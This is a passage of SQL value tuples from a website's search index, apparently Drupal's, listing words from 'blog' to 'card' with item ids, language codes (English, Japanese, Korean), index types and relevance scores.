('blog', 80, 'ko', 'help_search', 4),
('body', 4, 'en', 'help_search', 1),
('body', 4, 'ja', 'help_search', 1),
('body', 4, 'ko', 'help_search', 1),
('body', 11, 'en', 'help_search', 1),
('body', 11, 'ja', 'help_search', 1),
('body', 11, 'ko', 'help_search', 1),
('body', 46, 'en', 'help_search', 1),
('body', 46, 'ja', 'help_search', 1),
('body', 46, 'ko', 'help_search', 1),
('body', 204, 'en', 'node_search', 4),
('body', 204, 'ja', 'node_search', 4),
('bokalay', 27, 'en', 'node_search', 0.697623),
('bonuses', 162, 'en', 'node_search', 0.972861),
('boolean', 31, 'ja', 'help_search', 0.899454),
('boss', 120, 'en', 'node_search', 49),
('boss', 120, 'ja', 'node_search', 27),
('both', 17, 'en', 'help_search', 1),
('both', 17, 'ja', 'help_search', 1),
('both', 17, 'ko', 'help_search', 1),
('both', 18, 'en', 'help_search', 1),
('both', 18, 'ja', 'help_search', 1),
('both', 18, 'ko', 'help_search', 1),
('both', 24, 'en', 'help_search', 1),
('both', 24, 'ja', 'help_search', 1),
('both', 24, 'ko', 'help_search', 1),
('both', 27, 'en', 'help_search', 1),
('both', 27, 'en', 'node_search', 0.836446),
('both', 27, 'ja', 'help_search', 1),
('both', 27, 'ko', 'help_search', 1),
('both', 28, 'en', 'help_search', 1),
('both', 28, 'ja', 'help_search', 1),
('both', 28, 'ko', 'help_search', 1),
('both', 37, 'en', 'help_search', 0.972861),
('both', 37, 'ja', 'help_search', 0.972861),
('both', 37, 'ko', 'help_search', 0.972861),
('both', 42, 'en', 'help_search', 0.997306),
('both', 42, 'ja', 'help_search', 0.997306),
('both', 42, 'ko', 'help_search', 0.997306),
('both', 50, 'en', 'help_search', 1),
('both', 50, 'ja', 'help_search', 1),
('both', 50, 'ko', 'help_search', 1),
('both', 67, 'en', 'help_search', 1),
('both', 67, 'ja', 'help_search', 1),
('both', 67, 'ko', 'help_search', 1),
('both', 68, 'en', 'help_search', 1),
('both', 68, 'ja', 'help_search', 1),
('both', 68, 'ko', 'help_search', 1),
('both', 72, 'en', 'help_search', 1),
('both', 72, 'ja', 'help_search', 1),
('both', 72, 'ko', 'help_search', 1),
('both', 136, 'en', 'node_search', 1),
('both', 171, 'en', 'node_search', 1),
('both', 176, 'en', 'node_search', 1),
('both', 184, 'en', 'node_search', 1),
('both', 197, 'en', 'node_search', 1),
('bottom', 74, 'en', 'help_search', 1),
('bottom', 74, 'ja', 'help_search', 1),
('bottom', 74, 'ko', 'help_search', 1),
('bottom', 75, 'en', 'help_search', 1),
('bottom', 75, 'ja', 'help_search', 1),
('bottom', 75, 'ko', 'help_search', 1),
('bottom', 77, 'en', 'help_search', 1),
('bottom', 77, 'ja', 'help_search', 1),
('bottom', 77, 'ko', 'help_search', 1),
('bottom', 87, 'en', 'help_search', 1),
('bottom', 87, 'ja', 'help_search', 1),
('bottom', 87, 'ko', 'help_search', 1),
('bottom', 93, 'en', 'help_search', 0.96498),
('bottom', 93, 'ja', 'help_search', 0.96498),
('bottom', 93, 'ko', 'help_search', 0.96498),
('box', 1, 'en', 'help_search', 1),
('box', 1, 'ja', 'help_search', 1),
('box', 1, 'ko', 'help_search', 1),
('box', 13, 'en', 'help_search', 2),
('box', 13, 'ja', 'help_search', 2),
('box', 13, 'ko', 'help_search', 2),
('box', 15, 'en', 'help_search', 1),
('box', 15, 'ja', 'help_search', 1),
('box', 15, 'ko', 'help_search', 1),
('box', 18, 'en', 'help_search', 1),
('box', 18, 'ja', 'help_search', 1),
('box', 18, 'ko', 'help_search', 1),
('box', 24, 'en', 'node_search', 0.945829),
('box', 74, 'en', 'help_search', 3),
('box', 74, 'ja', 'help_search', 3),
('box', 74, 'ko', 'help_search', 3),
('box', 75, 'en', 'help_search', 2),
('box', 75, 'ja', 'help_search', 2),
('box', 75, 'ko', 'help_search', 2),
('box', 86, 'en', 'help_search', 1),
('box', 86, 'ja', 'help_search', 1),
('box', 86, 'ko', 'help_search', 1),
('box', 92, 'en', 'help_search', 2),
('box', 92, 'ja', 'help_search', 2),
('box', 92, 'ko', 'help_search', 2),
('boxes', 2, 'en', 'help_search', 1),
('boxes', 2, 'ja', 'help_search', 1),
('boxes', 2, 'ko', 'help_search', 1),
('boxes', 10, 'en', 'help_search', 2),
('boxes', 10, 'ja', 'help_search', 2),
('boxes', 10, 'ko', 'help_search', 2),
('boxes', 50, 'en', 'help_search', 2),
('boxes', 50, 'ja', 'help_search', 2),
('boxes', 50, 'ko', 'help_search', 2),
('boxes', 61, 'en', 'help_search', 1),
('boxes', 61, 'ja', 'help_search', 1),
('boxes', 61, 'ko', 'help_search', 1),
('boxes', 92, 'en', 'help_search', 1),
('boxes', 92, 'ja', 'help_search', 1),
('boxes', 92, 'ko', 'help_search', 1),
('brackets', 86, 'en', 'help_search', 1),
('brackets', 86, 'ja', 'help_search', 1),
('brackets', 86, 'ko', 'help_search', 1),
('branches', 27, 'en', 'node_search', 1),
('break', 28, 'en', 'help_search', 1),
('break', 28, 'ja', 'help_search', 1),
('break', 28, 'ko', 'help_search', 1),
('breakpoint', 6, 'en', 'help_search', 52.2799),
('breakpoint', 6, 'ja', 'help_search', 52.2799),
('breakpoint', 6, 'ko', 'help_search', 52.2799),
('breakpoint', 29, 'en', 'help_search', 0.976851),
('breakpoint', 29, 'ja', 'help_search', 0.976851),
('breakpoint', 29, 'ko', 'help_search', 0.976851),
('breakpoint', 35, 'en', 'help_search', 0.997306),
('breakpoint', 35, 'ja', 'help_search', 0.997306),
('breakpoint', 35, 'ko', 'help_search', 0.997306),
('breakpointenabled', 35, 'en', 'help_search', 0.993146),
('breakpointenabled', 35, 'ja', 'help_search', 0.993146),
('breakpointenabled', 35, 'ko', 'help_search', 0.993146),
('breakpoints', 6, 'en', 'help_search', 85.8495),
('breakpoints', 6, 'ja', 'help_search', 85.8495),
('breakpoints', 6, 'ko', 'help_search', 85.8495),
('breakpoints', 35, 'en', 'help_search', 1),
('breakpoints', 35, 'ja', 'help_search', 1),
('breakpoints', 35, 'ko', 'help_search', 1),
('breaks', 28, 'en', 'help_search', 3),
('breaks', 28, 'ja', 'help_search', 3),
('breaks', 28, 'ko', 'help_search', 3),
('breaks', 67, 'en', 'help_search', 1),
('breaks', 67, 'ja', 'help_search', 1),
('breaks', 67, 'ko', 'help_search', 1),
('bride', 204, 'en', 'node_search', 4),
('bride', 204, 'ja', 'node_search', 4),
('bridges', 27, 'en', 'node_search', 1),
('bright', 167, 'en', 'node_search', 1),
('bright', 169, 'en', 'node_search', 1),
('bright', 173, 'en', 'node_search', 1),
('brighter', 174, 'en', 'node_search', 1),
('brighter', 177, 'en', 'node_search', 1),
('brighter', 196, 'en', 'node_search', 1),
('bring', 169, 'en', 'node_search', 1),
('brings', 62, 'en', 'node_search', 1),
('brings', 67, 'ja', 'node_search', 1),
('brings', 135, 'en', 'node_search', 1),
('brings', 198, 'en', 'node_search', 1),
('brother', 23, 'en', 'node_search', 1),
('brother', 27, 'en', 'node_search', 0.677939),
('brothers', 23, 'en', 'node_search', 0.953396),
('browse', 14, 'en', 'help_search', 1),
('browse', 14, 'ja', 'help_search', 1),
('browse', 14, 'ko', 'help_search', 1),
('browse', 51, 'en', 'help_search', 1),
('browse', 51, 'ja', 'help_search', 1),
('browse', 51, 'ko', 'help_search', 1),
('browser', 13, 'en', 'help_search', 1),
('browser', 13, 'ja', 'help_search', 1),
('browser', 13, 'ko', 'help_search', 1),
('browser', 35, 'en', 'help_search', 1.98087),
('browser', 35, 'ja', 'help_search', 1.98087),
('browser', 35, 'ko', 'help_search', 1.98087),
('browser', 37, 'en', 'help_search', 0.909743),
('browser', 37, 'ja', 'help_search', 0.909743),
('browser', 37, 'ko', 'help_search', 0.909743),
('browser', 50, 'en', 'help_search', 2),
('browser', 50, 'ja', 'help_search', 2),
('browser', 50, 'ko', 'help_search', 2),
('browser', 65, 'en', 'help_search', 1),
('browser', 65, 'ja', 'help_search', 1),
('browser', 65, 'ko', 'help_search', 1),
('browsers', 81, 'en', 'help_search', 1),
('browsers', 81, 'ja', 'help_search', 1),
('browsers', 81, 'ko', 'help_search', 1),
('bue', 103, 'en', 'node_search', 2),
('bue', 103, 'ja', 'node_search', 2),
('bue', 141, 'en', 'node_search', 28),
('bue', 141, 'ja', 'node_search', 28),
('bugs', 38, 'en', 'help_search', 3),
('bugs', 38, 'ja', 'help_search', 3),
('bugs', 38, 'ko', 'help_search', 3),
('bugs', 72, 'en', 'help_search', 1),
('bugs', 72, 'ja', 'help_search', 1),
('bugs', 72, 'ko', 'help_search', 1),
('build', 155, 'en', 'node_search', 1),
('build', 162, 'en', 'node_search', 1),
('build', 193, 'en', 'node_search', 1),
('build', 198, 'en', 'node_search', 1),
('builder', 27, 'en', 'node_search', 0.766757),
('builder', 29, 'en', 'help_search', 1.98087),
('builder', 29, 'ja', 'help_search', 1.98087),
('builder', 29, 'ko', 'help_search', 1.98087),
('building', 11, 'en', 'node_search', 1),
('building', 11, 'ja', 'node_search', 1),
('building', 24, 'en', 'node_search', 0.961087),
('building', 27, 'en', 'node_search', 2.39529),
('building', 29, 'en', 'help_search', 1),
('building', 29, 'ja', 'help_search', 1),
('building', 29, 'ko', 'help_search', 1),
('building', 162, 'en', 'node_search', 0.916736),
('building', 165, 'en', 'node_search', 1),
('building', 167, 'en', 'node_search', 1),
('building', 169, 'en', 'node_search', 1),
('building', 171, 'en', 'node_search', 1),
('building', 173, 'en', 'node_search', 1),
('building', 174, 'en', 'node_search', 2),
('building', 175, 'en', 'node_search', 1),
('building', 177, 'en', 'node_search', 1),
('building', 180, 'en', 'node_search', 1),
('building', 187, 'en', 'node_search', 1),
('building', 195, 'en', 'node_search', 27),
('buildings', 27, 'en', 'node_search', 2.7414),
('built', 27, 'en', 'node_search', 1.47455),
('builtin', 41, 'en', 'help_search', 1),
('builtin', 41, 'ja', 'help_search', 1),
('builtin', 41, 'ko', 'help_search', 1),
('builtin', 42, 'en', 'help_search', 1),
('builtin', 42, 'ja', 'help_search', 1),
('builtin', 42, 'ko', 'help_search', 1),
('bulk', 37, 'en', 'help_search', 0.902857),
('bulk', 37, 'ja', 'help_search', 0.902857),
('bulk', 37, 'ko', 'help_search', 0.902857),
('bulk', 61, 'en', 'help_search', 2),
('bulk', 61, 'ja', 'help_search', 2),
('bulk', 61, 'ko', 'help_search', 2),
('bulk', 89, 'en', 'help_search', 37.9822),
('bulk', 89, 'ja', 'help_search', 37.974),
('bulk', 89, 'ko', 'help_search', 37.9822),
('bulk', 93, 'en', 'help_search', 18.9762),
('bulk', 93, 'ja', 'help_search', 18.9762),
('bulk', 93, 'ko', 'help_search', 18.9762),
('bunpou', 62, 'en', 'node_search', 0.873132),
('burmese', 3, 'en', 'node_search', 0.96498),
('burmese', 3, 'ko', 'node_search', 0.957226),
('burmese', 31, 'en', 'node_search', 1.82727),
('bus', 27, 'en', 'node_search', 1.31535),
('buses', 23, 'en', 'node_search', 1),
('business', 23, 'en', 'node_search', 2),
('business', 24, 'en', 'node_search', 0.794753),
('business', 62, 'en', 'node_search', 0.839384),
('business', 87, 'en', 'node_search', 1),
('businesses', 24, 'en', 'node_search', 3.80374),
('but', 1, 'en', 'help_search', 1),
('but', 1, 'ja', 'help_search', 1),
('but', 1, 'ko', 'help_search', 1),
('but', 7, 'en', 'help_search', 1.81991),
('but', 7, 'ja', 'help_search', 1.81991),
('but', 7, 'ko', 'help_search', 1.81991),
('but', 9, 'en', 'help_search', 1),
('but', 9, 'ja', 'help_search', 1),
('but', 9, 'ko', 'help_search', 1),
('but', 25, 'ja', 'help_search', 1),
('but', 29, 'en', 'help_search', 1),
('but', 29, 'ja', 'help_search', 1),
('but', 29, 'ko', 'help_search', 1),
('but', 31, 'ja', 'help_search', 1),
('but', 32, 'en', 'help_search', 1),
('but', 32, 'ja', 'help_search', 1),
('but', 32, 'ko', 'help_search', 1),
('but', 41, 'en', 'help_search', 1),
('but', 41, 'ja', 'help_search', 1),
('but', 41, 'ko', 'help_search', 1),
('but', 62, 'en', 'node_search', 1),
('but', 70, 'en', 'help_search', 1),
('but', 70, 'ja', 'help_search', 1),
('but', 70, 'ko', 'help_search', 1),
('but', 72, 'en', 'help_search', 2),
('but', 72, 'ja', 'help_search', 2),
('but', 72, 'ko', 'help_search', 2),
('but', 78, 'en', 'help_search', 1),
('but', 78, 'ja', 'help_search', 1),
('but', 78, 'ko', 'help_search', 1),
('but', 89, 'en', 'help_search', 1),
('but', 89, 'ja', 'help_search', 1),
('but', 89, 'ko', 'help_search', 1),
('but', 92, 'en', 'help_search', 1),
('but', 92, 'ja', 'help_search', 1),
('but', 92, 'ko', 'help_search', 1),
('but', 136, 'en', 'node_search', 1),
('but', 138, 'en', 'node_search', 1),
('but', 179, 'en', 'node_search', 1),
('but', 182, 'en', 'node_search', 1),
('but', 190, 'en', 'node_search', 1),
('but', 199, 'en', 'node_search', 1),
('but', 204, 'en', 'node_search', 4),
('but', 204, 'ja', 'node_search', 4),
('butter', 79, 'en', 'help_search', 1),
('butter', 79, 'ja', 'help_search', 1),
('butter', 79, 'ko', 'help_search', 1),
('button', 10, 'en', 'help_search', 1),
('button', 10, 'ja', 'help_search', 1),
('button', 10, 'ko', 'help_search', 1),
('button', 22, 'en', 'help_search', 4.99731),
('button', 22, 'ja', 'help_search', 4.99731),
('button', 22, 'ko', 'help_search', 4.99731),
('button', 23, 'en', 'help_search', 1.81268),
('button', 23, 'ja', 'help_search', 1.81268),
('button', 23, 'ko', 'help_search', 1.81268),
('button', 39, 'en', 'help_search', 1),
('button', 39, 'ja', 'help_search', 1),
('button', 39, 'ko', 'help_search', 1),
('button', 60, 'en', 'help_search', 1),
('button', 60, 'ja', 'help_search', 1),
('button', 60, 'ko', 'help_search', 1),
('button', 64, 'en', 'help_search', 1),
('button', 64, 'ja', 'help_search', 1),
('button', 64, 'ko', 'help_search', 1),
('button', 68, 'en', 'help_search', 1),
('button', 68, 'ja', 'help_search', 1),
('button', 68, 'ko', 'help_search', 1),
('button', 81, 'en', 'help_search', 2),
('button', 81, 'ja', 'help_search', 2),
('button', 81, 'ko', 'help_search', 2),
('button', 89, 'en', 'help_search', 1),
('button', 89, 'ja', 'help_search', 1),
('button', 89, 'ko', 'help_search', 1),
('buttons', 22, 'en', 'help_search', 1),
('buttons', 22, 'ja', 'help_search', 1),
('buttons', 22, 'ko', 'help_search', 1),
('buttons', 23, 'en', 'help_search', 10.2472),
('buttons', 23, 'ja', 'help_search', 10.2472),
('buttons', 23, 'ko', 'help_search', 10.2472),
('buying', 23, 'en', 'node_search', 1),
('buying', 27, 'en', 'node_search', 0.685676),
('buying', 30, 'en', 'node_search', 2),
('bwar', 103, 'en', 'node_search', 2),
('bwar', 103, 'ja', 'node_search', 2),
('bwar', 137, 'en', 'node_search', 28),
('bwar', 137, 'ja', 'node_search', 28),
('bypass', 59, 'en', 'help_search', 4),
('bypass', 59, 'ja', 'help_search', 4),
('bypass', 59, 'ko', 'help_search', 4),
('bypass', 61, 'en', 'help_search', 4),
('bypass', 61, 'ja', 'help_search', 4),
('bypass', 61, 'ko', 'help_search', 4),
('cache', 34, 'en', 'help_search', 1),
('cache', 34, 'ja', 'help_search', 1),
('cache', 34, 'ko', 'help_search', 1),
('cache', 37, 'en', 'help_search', 22.2999),
('cache', 37, 'ja', 'help_search', 22.2999),
('cache', 37, 'ko', 'help_search', 22.2999),
('cache', 45, 'en', 'help_search', 1),
('cache', 45, 'ja', 'help_search', 1),
('cache', 45, 'ko', 'help_search', 1),
('cache', 70, 'en', 'help_search', 58),
('cache', 70, 'ja', 'help_search', 58),
('cache', 70, 'ko', 'help_search', 58),
('cache', 73, 'en', 'help_search', 2),
('cache', 73, 'ja', 'help_search', 2),
('cache', 73, 'ko', 'help_search', 2),
('cacheable', 37, 'en', 'help_search', 0.934703),
('cacheable', 37, 'ja', 'help_search', 0.934703),
('cacheable', 37, 'ko', 'help_search', 0.934703),
('cached', 37, 'en', 'help_search', 2),
('cached', 37, 'ja', 'help_search', 2),
('cached', 37, 'ko', 'help_search', 2),
('cached', 70, 'en', 'help_search', 7),
('cached', 70, 'ja', 'help_search', 7),
('cached', 70, 'ko', 'help_search', 7),
('caches', 37, 'en', 'help_search', 1.97286),
('caches', 37, 'ja', 'help_search', 1.97286),
('caches', 37, 'ko', 'help_search', 1.97286),
('caches', 70, 'en', 'help_search', 4),
('caches', 70, 'ja', 'help_search', 4),
('caches', 70, 'ko', 'help_search', 4),
('caching', 37, 'en', 'help_search', 21),
('caching', 37, 'ja', 'help_search', 21),
('caching', 37, 'ko', 'help_search', 21),
('cad', 24, 'en', 'node_search', 1),
('cad', 24, 'ko', 'node_search', 1),
('calculated', 37, 'en', 'help_search', 1.9496),
('calculated', 37, 'ja', 'help_search', 1.9496),
('calculated', 37, 'ko', 'help_search', 1.9496),
('calculating', 27, 'en', 'node_search', 0.909743),
('calculation', 70, 'en', 'help_search', 1),
('calculation', 70, 'ja', 'help_search', 1),
('calculation', 70, 'ko', 'help_search', 1),
('calculations', 37, 'en', 'help_search', 1),
('calculations', 37, 'ja', 'help_search', 1),
('calculations', 37, 'ko', 'help_search', 1),
('calculations', 70, 'en', 'help_search', 2),
('calculations', 70, 'ja', 'help_search', 2),
('calculations', 70, 'ko', 'help_search', 2),
('calendar', 93, 'en', 'help_search', 1),
('calendar', 93, 'ja', 'help_search', 1),
('calendar', 93, 'ko', 'help_search', 1),
('called', 23, 'en', 'help_search', 1),
('called', 23, 'ja', 'help_search', 1),
('called', 23, 'ko', 'help_search', 1),
('called', 30, 'en', 'help_search', 0.886095),
('called', 30, 'ja', 'help_search', 0.886095),
('called', 30, 'ko', 'help_search', 0.886095),
('called', 32, 'en', 'help_search', 1),
('called', 32, 'ja', 'help_search', 1),
('called', 32, 'ko', 'help_search', 1),
('called', 44, 'en', 'help_search', 1),
('called', 44, 'ja', 'help_search', 1),
('called', 44, 'ko', 'help_search', 1),
('called', 46, 'en', 'help_search', 1),
('called', 46, 'ja', 'help_search', 1),
('called', 46, 'ko', 'help_search', 1),
('called', 65, 'en', 'help_search', 1),
('called', 65, 'ja', 'help_search', 1),
('called', 65, 'ko', 'help_search', 1),
('called', 67, 'en', 'help_search', 1),
('called', 67, 'ja', 'help_search', 1),
('called', 67, 'ko', 'help_search', 1),
('called', 91, 'en', 'help_search', 1),
('called', 91, 'ja', 'help_search', 1),
('called', 91, 'ko', 'help_search', 1),
('came', 3, 'en', 'node_search', 1),
('came', 3, 'ko', 'node_search', 1),
('came', 19, 'en', 'node_search', 28),
('came', 19, 'ko', 'node_search', 28),
('can', 1, 'en', 'help_search', 1),
('can', 1, 'ja', 'help_search', 1),
('can', 1, 'ko', 'help_search', 1),
('can', 2, 'en', 'help_search', 3),
('can', 2, 'ja', 'help_search', 3),
('can', 2, 'ko', 'help_search', 3),
('can', 3, 'en', 'node_search', 1),
('can', 3, 'ko', 'node_search', 1),
('can', 4, 'en', 'help_search', 1),
('can', 4, 'en', 'node_search', 2),
('can', 4, 'ja', 'help_search', 1),
('can', 4, 'ja', 'node_search', 2),
('can', 4, 'ko', 'help_search', 1),
('can', 5, 'en', 'node_search', 1),
('can', 5, 'ko', 'node_search', 1),
('can', 6, 'en', 'help_search', 3.96109),
('can', 6, 'ja', 'help_search', 3.96109),
('can', 6, 'ko', 'help_search', 3.96109),
('can', 7, 'en', 'help_search', 19.9167),
('can', 7, 'ja', 'help_search', 19.9167),
('can', 7, 'ko', 'help_search', 19.9167),
('can', 8, 'en', 'help_search', 21),
('can', 8, 'ja', 'help_search', 21),
('can', 8, 'ko', 'help_search', 21),
('can', 9, 'en', 'help_search', 19),
('can', 9, 'ja', 'help_search', 19),
('can', 9, 'ko', 'help_search', 19),
('can', 10, 'en', 'help_search', 21),
('can', 10, 'ja', 'help_search', 21),
('can', 10, 'ko', 'help_search', 21),
('can', 11, 'en', 'help_search', 4.87957),
('can', 11, 'ja', 'help_search', 4.87957),
('can', 11, 'ko', 'help_search', 4.87957),
('can', 17, 'en', 'help_search', 2),
('can', 17, 'ja', 'help_search', 2),
('can', 17, 'ko', 'help_search', 2),
('can', 18, 'en', 'help_search', 1),
('can', 18, 'ja', 'help_search', 1),
('can', 18, 'ko', 'help_search', 1),
('can', 20, 'en', 'help_search', 3),
('can', 20, 'ja', 'help_search', 3),
('can', 20, 'ko', 'help_search', 3),
('can', 24, 'en', 'help_search', 3),
('can', 24, 'ja', 'help_search', 3),
('can', 24, 'ko', 'help_search', 3),
('can', 25, 'ja', 'help_search', 2),
('can', 27, 'en', 'help_search', 3),
('can', 27, 'ja', 'help_search', 3),
('can', 27, 'ko', 'help_search', 3),
('can', 28, 'en', 'help_search', 5.89945),
('can', 28, 'en', 'node_search', 3),
('can', 28, 'ja', 'help_search', 5.89945),
('can', 28, 'ko', 'help_search', 5.89945),
('can', 29, 'en', 'help_search', 3),
('can', 29, 'en', 'node_search', 3),
('can', 29, 'ja', 'help_search', 3),
('can', 29, 'ko', 'help_search', 3),
('can', 30, 'en', 'help_search', 5.18083),
('can', 30, 'ja', 'help_search', 5.18083),
('can', 30, 'ko', 'help_search', 5.18083),
('can', 31, 'en', 'node_search', 2.86625),
('can', 31, 'ja', 'help_search', 8.51489),
('can', 32, 'en', 'help_search', 4),
('can', 32, 'ja', 'help_search', 4),
('can', 32, 'ko', 'help_search', 4),
('can', 33, 'en', 'help_search', 2),
('can', 33, 'ja', 'help_search', 2),
('can', 33, 'ko', 'help_search', 2),
('can', 34, 'en', 'help_search', 2),
('can', 34, 'ja', 'help_search', 2),
('can', 34, 'ko', 'help_search', 2),
('can', 35, 'en', 'help_search', 4.98493),
('can', 35, 'ja', 'help_search', 4.98493),
('can', 35, 'ko', 'help_search', 4.98493),
('can', 36, 'en', 'help_search', 3),
('can', 36, 'ja', 'help_search', 3),
('can', 36, 'ko', 'help_search', 3),
('can', 37, 'en', 'help_search', 21),
('can', 37, 'ja', 'help_search', 21),
('can', 37, 'ko', 'help_search', 21),
('can', 39, 'en', 'help_search', 19),
('can', 39, 'ja', 'help_search', 19),
('can', 39, 'ko', 'help_search', 19),
('can', 40, 'en', 'help_search', 1),
('can', 40, 'ja', 'help_search', 1),
('can', 40, 'ko', 'help_search', 1),
('can', 41, 'en', 'help_search', 26),
('can', 41, 'ja', 'help_search', 26),
('can', 41, 'ko', 'help_search', 26),
('can', 42, 'en', 'help_search', 1),
('can', 42, 'ja', 'help_search', 1),
('can', 42, 'ko', 'help_search', 1),
('can', 43, 'en', 'help_search', 3),
('can', 43, 'ja', 'help_search', 3),
('can', 43, 'ko', 'help_search', 3),
('can', 44, 'en', 'help_search', 1),
('can', 44, 'ja', 'help_search', 1),
('can', 44, 'ko', 'help_search', 1),
('can', 45, 'en', 'help_search', 2),
('can', 45, 'ja', 'help_search', 2),
('can', 45, 'ko', 'help_search', 2),
('can', 46, 'en', 'help_search', 21),
('can', 46, 'ja', 'help_search', 21),
('can', 46, 'ko', 'help_search', 21),
('can', 47, 'en', 'help_search', 1),
('can', 47, 'ja', 'help_search', 1),
('can', 47, 'ko', 'help_search', 1),
('can', 48, 'en', 'help_search', 3),
('can', 48, 'ja', 'help_search', 3),
('can', 48, 'ko', 'help_search', 3),
('can', 50, 'en', 'help_search', 2),
('can', 50, 'ja', 'help_search', 2),
('can', 50, 'ko', 'help_search', 2),
('can', 53, 'en', 'help_search', 1),
('can', 53, 'ja', 'help_search', 1),
('can', 53, 'ko', 'help_search', 1),
('can', 54, 'en', 'help_search', 3),
('can', 54, 'ja', 'help_search', 3),
('can', 54, 'ko', 'help_search', 3),
('can', 55, 'en', 'help_search', 1),
('can', 55, 'ja', 'help_search', 1),
('can', 55, 'ko', 'help_search', 1),
('can', 56, 'en', 'help_search', 1),
('can', 56, 'ja', 'help_search', 1),
('can', 56, 'ko', 'help_search', 1),
('can', 59, 'en', 'help_search', 21),
('can', 59, 'ja', 'help_search', 21),
('can', 59, 'ko', 'help_search', 21),
('can', 60, 'en', 'help_search', 20),
('can', 60, 'ja', 'help_search', 20),
('can', 60, 'ko', 'help_search', 20),
('can', 61, 'en', 'help_search', 22),
('can', 61, 'ja', 'help_search', 22),
('can', 61, 'ko', 'help_search', 22),
('can', 62, 'en', 'help_search', 1),
('can', 62, 'ja', 'help_search', 1),
('can', 62, 'ko', 'help_search', 1),
('can', 63, 'en', 'help_search', 22),
('can', 63, 'ja', 'help_search', 22),
('can', 63, 'ko', 'help_search', 22),
('can', 64, 'en', 'help_search', 21),
('can', 64, 'ja', 'help_search', 21),
('can', 64, 'ko', 'help_search', 21),
('can', 65, 'en', 'help_search', 1),
('can', 65, 'ja', 'help_search', 1),
('can', 65, 'ko', 'help_search', 1),
('can', 67, 'en', 'help_search', 1),
('can', 67, 'ja', 'help_search', 1),
('can', 67, 'ko', 'help_search', 1),
('can', 68, 'en', 'help_search', 4.67183),
('can', 68, 'ja', 'help_search', 4.67183),
('can', 68, 'ko', 'help_search', 4.67183),
('can', 69, 'en', 'help_search', 2),
('can', 69, 'ja', 'help_search', 2),
('can', 69, 'ko', 'help_search', 2),
('can', 70, 'en', 'help_search', 2),
('can', 70, 'ja', 'help_search', 2),
('can', 70, 'ko', 'help_search', 2),
('can', 72, 'en', 'help_search', 23),
('can', 72, 'ja', 'help_search', 23),
('can', 72, 'ko', 'help_search', 23),
('can', 74, 'en', 'help_search', 1),
('can', 74, 'ja', 'help_search', 1),
('can', 74, 'ko', 'help_search', 1),
('can', 75, 'en', 'help_search', 1),
('can', 75, 'ja', 'help_search', 1),
('can', 75, 'ko', 'help_search', 1),
('can', 76, 'en', 'help_search', 1),
('can', 76, 'ja', 'help_search', 1),
('can', 76, 'ko', 'help_search', 1),
('can', 79, 'en', 'help_search', 20),
('can', 79, 'ja', 'help_search', 20),
('can', 79, 'ko', 'help_search', 20),
('can', 80, 'en', 'help_search', 7),
('can', 80, 'ja', 'help_search', 7),
('can', 80, 'ko', 'help_search', 7),
('can', 84, 'en', 'help_search', 1),
('can', 84, 'ja', 'help_search', 1),
('can', 84, 'ko', 'help_search', 1),
('can', 86, 'en', 'help_search', 8),
('can', 86, 'ja', 'help_search', 8),
('can', 86, 'ko', 'help_search', 8),
('can', 87, 'en', 'help_search', 1),
('can', 87, 'ja', 'help_search', 1),
('can', 87, 'ko', 'help_search', 1),
('can', 89, 'en', 'help_search', 19),
('can', 89, 'ja', 'help_search', 19),
('can', 89, 'ko', 'help_search', 19),
('can', 90, 'en', 'help_search', 1),
('can', 90, 'ja', 'help_search', 1),
('can', 90, 'ko', 'help_search', 1),
('can', 93, 'en', 'help_search', 6.85746),
('can', 93, 'ja', 'help_search', 6.85746),
('can', 93, 'ko', 'help_search', 6.85746),
('can', 135, 'en', 'node_search', 1),
('cancel', 22, 'en', 'help_search', 0.968904),
('cancel', 22, 'ja', 'help_search', 0.968904),
('cancel', 22, 'ko', 'help_search', 0.968904),
('cancel', 87, 'en', 'help_search', 8),
('cancel', 87, 'ja', 'help_search', 8),
('cancel', 87, 'ko', 'help_search', 8),
('cancel', 91, 'en', 'help_search', 3.9235),
('cancel', 91, 'ja', 'help_search', 3.9074),
('cancel', 91, 'ko', 'help_search', 3.9235),
('canceled', 86, 'en', 'help_search', 5.98902),
('canceled', 86, 'ja', 'help_search', 5.98902),
('canceled', 86, 'ko', 'help_search', 5.98902),
('candidate', 156, 'en', 'node_search', 1),
('candidate', 160, 'en', 'node_search', 27),
('candidate', 161, 'en', 'node_search', 27),
('candidate', 166, 'en', 'node_search', 27),
('candidate', 168, 'en', 'node_search', 27),
('candidate', 170, 'en', 'node_search', 27),
('candidate', 180, 'en', 'node_search', 27),
('candidate', 185, 'en', 'node_search', 27),
('candidate', 186, 'en', 'node_search', 27),
('candidates', 25, 'en', 'node_search', 2),
('candidates', 138, 'en', 'node_search', 2),
('candidates', 142, 'en', 'node_search', 1),
('candidates', 154, 'en', 'node_search', 3),
('candidates', 155, 'en', 'node_search', 1),
('candidates', 157, 'en', 'node_search', 3),
('candidates', 160, 'en', 'node_search', 1),
('candidates', 161, 'en', 'node_search', 1),
('candidates', 162, 'en', 'node_search', 0.876337),
('candidates', 163, 'en', 'node_search', 2.87634),
('candidates', 164, 'en', 'node_search', 1),
('candidates', 165, 'en', 'node_search', 3),
('candidates', 167, 'en', 'node_search', 3),
('candidates', 169, 'en', 'node_search', 5),
('candidates', 173, 'en', 'node_search', 6),
('candidates', 176, 'en', 'node_search', 4),
('candidates', 179, 'en', 'node_search', 1),
('candidates', 184, 'en', 'node_search', 1),
('cannot', 7, 'en', 'help_search', 1),
('cannot', 7, 'ja', 'help_search', 1),
('cannot', 7, 'ko', 'help_search', 1),
('cannot', 33, 'en', 'help_search', 1),
('cannot', 33, 'ja', 'help_search', 1),
('cannot', 33, 'ko', 'help_search', 1),
('cannot', 75, 'en', 'help_search', 1),
('cannot', 75, 'ja', 'help_search', 1),
('cannot', 75, 'ko', 'help_search', 1),
('cannot', 78, 'en', 'help_search', 1),
('cannot', 78, 'ja', 'help_search', 1),
('cannot', 78, 'ko', 'help_search', 1),
('cannot', 90, 'en', 'help_search', 1),
('cannot', 90, 'ja', 'help_search', 1),
('cannot', 90, 'ko', 'help_search', 1),
('cannot', 93, 'en', 'help_search', 1),
('cannot', 93, 'ja', 'help_search', 1),
('cannot', 93, 'ko', 'help_search', 1),
('capable', 27, 'en', 'node_search', 0.916736),
('captcha', 11, 'en', 'help_search', 0.945829),
('captcha', 11, 'ja', 'help_search', 0.945829),
('captcha', 11, 'ko', 'help_search', 0.945829),
('car', 24, 'en', 'node_search', 0.976851),
('car', 27, 'en', 'node_search', 3.95426),
('card', 3, 'en', 'node_search', 1),
('card', 3, 'ko', 'node_search', 1),
('card', 24, 'ja', 'node_search', 0.661163),
